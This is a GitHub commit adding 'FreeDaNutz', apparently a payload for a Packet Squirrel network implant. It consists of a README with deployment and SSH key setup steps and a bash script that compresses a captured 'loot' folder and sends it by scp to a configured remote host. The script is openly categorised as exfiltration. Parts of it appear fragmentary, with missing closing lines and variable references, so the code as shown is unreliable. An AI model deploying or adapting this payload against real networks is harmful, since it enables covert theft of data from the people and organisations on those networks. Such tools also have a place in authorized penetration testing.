Add files via upload

Darren Kitchen 2018-12-15 16:18:34 -08:00 committed by GitHub
parent aa82860dd4
commit d5ff3cb898
No known key found for this signature in database
2 changed files with 271 additions and 0 deletions

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@ -0,0 +1,67 @@
| | |
| **Title** | FreeDaNutz |
| **Description** | This payload will compress the loot folder and then send that file to a remote server via scp |
| **Author** | []( |
| **Version** | 1.0 |
| **Category** | exfiltration |
| **Target** | Any |
| **Net Mode** | NAT |
| Meaning | Color | Description |
| SUCCESS: | Rapid White | Payload is shutting down |
| FAIL: | Red | No USB storage found |
| | Red | Cannot send files to remote host |
| | Red | Cannot ping remote host |
| ATTACK: | Blink Yellow | Payload is launching |
| | Rapid Cyan | Compressing Loot Folder |
| | Rapid Magenta | Sending Compressed File |
### **Description**
This payload will compress the entire /mnt/loot folder. It will then send via scp that folder to a host you specify. This payload runs some checks to make sure things are set up correctly before it attempts to send any data over the network. If fatal errors occur then trouble shooting data is dumped into /mnt/loot/freedanutz/log.txt
### **Requirements**
+ USB access to get loot folder and to log messages.
### **SSH Setup**
1. SSH to the Squirrel
2. run: mkdir /root/.ssh
3. run: ssh-keygen -t rsa -N "" -f /root/.ssh/id_rsa
4. run: chmod 600 /root/.ssh/id_rsa
5. run: cat /root/.ssh/ | ssh user@remotehost 'cat >> .ssh/authorized_keys'
6. make sure it works:
ssh user@remotehost
Notes: The first time you may have to type "yes" to accept. Afterwards you shouldn't have to do this step.
### **Payload Setup**
1. Edit the config variables at the top.
The main variables are:
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
exfilhostuser="root" # The username of the account for the above hostname
sshport="22" # Port to send data out on
exfilfile="backup.tar.gz" # The name of the compressed loot folder
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
lootfolderpath="/mnt/loot" # Path to loot folder
payloadlogpath="/mnt/loot/freedanutz"# Path to store payload log file
2. Copy into the ~/payloads/switch<n> folder you wish to deploy on.
3. Connect into a target machine with access to the LAN.
4. Set switch to the <n> spot and power up.
5. Leave, get coffee, take a nap while the payload runs.
6. When all is done the LED will just go blank. It is now safe to unplug and go about your day.

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@ -0,0 +1,204 @@
# Title: FreeDaNutz
# Description: This payload will compress the loot folder and then send that file to a remote server via scp
# Author:
# Version: 1.0
# Category: exfiltration
# Target: Any
# Net Mode: NAT
# LEDs
# FAIL: This payload will LED FAIL (blink RED) for the following reasons
# No USB storage found
# Cannot send files to remote host
# Cannot ping remote host
# ATTACK: Setting NAT: Blink Yellow
# Compressing: Rapid Cyan
# Sending: Rapid Magenta
# Cleaning up: Rapid White
# SUCCESS: LED goes off
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
exfilhostuser="root" # The username of the account for the above hostname
sshport="22" # Port to send data out on
exfilfile="backup.tar.gz" # The name of the compressed loot folder
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
lootfolderpath="/mnt/loot" # Path to loot folder
payloadlogpath="/mnt/loot/freedanutz" # Path to store payload log file
# The main run function.
# Inputs: None
# Returns: None
# Upon success it will call the finish() function to shutdown.
function run() {
# Create log directory
# We store the tarball on /mnt outside the /mnt/loot folder in order to make sure we do not use up all the limited space on the device itself.
if [ ! -d $payloadlogpath ]; then
# If log path does not exisit then we should create it.
mkdir -p $payloadlogpath &> /dev/null
# Set networking to NAT mode and wait eight seconds
sleep 8
# If we cannot reach the server we want to send our data to then there is no point in going any further.
ping $exfilhost -w 3 &> /dev/null
if [ $pingtest -ne 0 ]; then
fail "FATAL ERROR: Cannot reach $exfilhost"
# Let's test to make sure scp keys are set up correclty and we can send files before we send loot.
# Start blinking LED Cyan very fast to indicate compressing is in progress.
# Compress the loot folder
echo "tar -czf $exfilfilepath $lootfolderpath" >> $payloadlogpath/log.txt
tar -czf $exfilfilepath $lootfolderpath &> /dev/null
# Start blinking LED Magenta very fast to indicate sending is in progress.
# Send compress file out into the world.
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath &> /dev/null
# Clean up
# A function to clean up files and safely shutdown
# Inputs: None
# Returns: None
function finish() {
# Remove the file we have sent out as it is no longer needed and just taking up space.
echo "Removing $exfilfilepath" >> $payloadlogpath/log.txt
rm $exfilfilepath
# Halt the system; turn off LED
# A function to test if the payload can send files to the remote host.
# Inputs: None
# Returns: None
# On test fail will abort script.
function testssh() {
# Create test file.
touch $exfilfilepath.test
scp -P $sshport -C -i $identityfile $exfilfilepath.test $exfilhostuser@$exfilhost:$remotepath &> /dev/null
if [ $error -ne 0 ]; then
# We could not send test file; this is a fatal error.
rm $exfilfilepath.test
fail "FATAL ERROR: Could not access and/or login to $exfilhostuser@$exfilhost remove path = $remotepath"
# Be nice and try to remove the test file we uploaded.
ssh $exfilhostuser@$exfilhost 'rm $remotepath.test'
rm $exfilfilepath.test
# A function to standardize how fatal errors fail.
# Inputs: $1:Error message
# Returns: None
# This will abort the script.
function fail() {
echo $1 >> $payloadlogpath/log.txt
# A function to dump data to aid in trouble shooting problems.
# Inputs: None
# Returns: None
function debugdata() {
echo "=== DEBUG DATA ===" >> $payloadlogpath/log.txt
ifconfig >> $payloadlogpath/log.txt
echo "=== Scp Command ===" >> $payloadlogpath/log.txt
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
echo "=== Tar Command ===" >> $payloadlogpath/log.txt
echo "tar -czf $exfilfilepath $lootfolderpath &> /dev/null" >> $payloadlogpath/log.txt
echo "=== Public Key Dump ===" >> $payloadlogpath/log.txt
cat $ >> $payloadlogpath/log.txt
echo "=== Network Config Dump ===" >> $payloadlogpath/log.txt
cat /etc/config/network >> $payloadlogpath/log.txt
echo "=== Ping $exfilhost Results ===" >> $payloadlogpath/log.txt
echo "If there is no data it likely means that $exfilhost is a bad address." >> $payloadlogpath/log.txt
ping $exfilhost -w 3 >> $payloadlogpath/log.txt
echo "=== lsusb Dump ===" >> $payloadlogpath/log.txt
lsusb >> $payloadlogpath/log.txt
# Zero out payload log file.
echo "" > $payloadlogpath/log.txt
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Check to see if the .ssh folder exists. If it does not exist then create it.
if [ ! -d "/root/.ssh" ]; then
# If it doesn't then we need to create it.
echo "Warning: /root/.ssh folder did not exits. We created it." >> $payloadlogpath/log.txt
mkdir -p /root/.ssh &> /dev/null
# Check if identity file exists. If not create it.
if [ ! -f $identityfile ]; then
# We need to log a warning that since the identify file was not found then this payload likely will fail. This payload will give the user a likely way to fix this problem.
echo "Warning: We had to create $identityfile" >> $payloadlogpath/log.txt
echo "To complete setup you'll likely need to run this command on the squirrel (make sure when you do your squirrel can access $exfilhost)" >> $payloadlogpath/log.txt
echo "cat $ | ssh $exfilhostuser@$exfilhost 'cat >> .ssh/authorized_keys'" >> $payloadlogpath/log.txt
ssh-keygen -t rsa -N "" -f $identityfile
# USB storage could not be found; log it in ~/payload/switch1/log.txt
fail "Could not load USB storage. Stopping..."